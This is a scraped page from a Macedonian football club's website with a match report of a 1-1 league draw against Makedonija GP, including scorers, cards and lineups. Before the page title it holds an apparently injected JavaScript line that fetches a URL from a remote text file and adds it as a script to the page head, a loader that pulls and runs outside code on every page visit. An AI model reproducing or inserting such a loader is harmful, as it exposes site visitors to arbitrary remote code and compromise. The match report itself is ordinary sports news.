;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Реми (1-1) против Македонија ЃП во Ѓорче Петров
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Реми (1-1) против Македонија ЃП во Ѓорче Петров

Работнички ремизираше (1-1) на натпреварот против Македонија ЃП во Ѓорче Петров, во 25.коло од Првата фудбалска лига. Тоа беше деби на клупата за новиот шеф на стручниот штаб Баже Лазаревски, кој го наследи Жикица Тасевски. По овој меч, Работнички се наоѓа на шестата позиција на табелата со 32 бода, еден помалку од четвртопласираниот тим на Ренова.

Почетокот на мечот не донесе големи возбудувања, а првата голема шанса ја имаше Баже Илијоски во 22.минута. Тој го мина голманот Марко Јовановски, ја упати топката кон мрежата, но на гол – линијата се испречи Андре Лукас Матос Гама. Потоа се заканија и Христијан Кировски и Боби Божиновски на спротивната страна.

Македонија ЃП поведе во 63.минута. По проигрувањето од левата страна, Христијан Кировски упати силен удар од 15 метри и погоди на вистинското место, а Ристо Јанков беше немоќен.

Сепак, Работнички брзо возврати. Во 68.минута, по центаршутот од левата страна, топката дојде до Николче Шаркоски кој го израмни резултатот.

До крајот, Илијоски имаше можност за Работнички, Боби Божиновски се закани со удар од далечина кон голот на Јанков, но резултатот остана непроменет.

МАКЕДОНИЈА ЃП – РАБОТНИЧКИ 1-1 (0-0)

Стадион во Ѓорче Петров. Судија: Марјан Гоцевски (Струмица). Стрелци: Кировски 63’ (Македонија ЃП), Шаркоски 68’ (Работнички). Ж. картони: Кировски, Стјепановиќ (Македонија ЃП), Илијоски (Работнички).

МАКЕДОНИЈА ЃП: Јовановски, Браз Да Силва, Стојчевски (55’ Карваљо), Нето, Стојановски, Гама (88’ Демир), Филиповски (73’ Стјепановиќ), Божиновски, Тантуровски, Робсон Да Силва, Кировски.

РАБОТНИЧКИ: Јанков, Ѓоргиевски, Борха, Вијачки, Херера, Петровиќ, Ацковски, Пеев, Шаркоски (90’ Фазлиу), Манојан (62’ Гофри), Илијоски.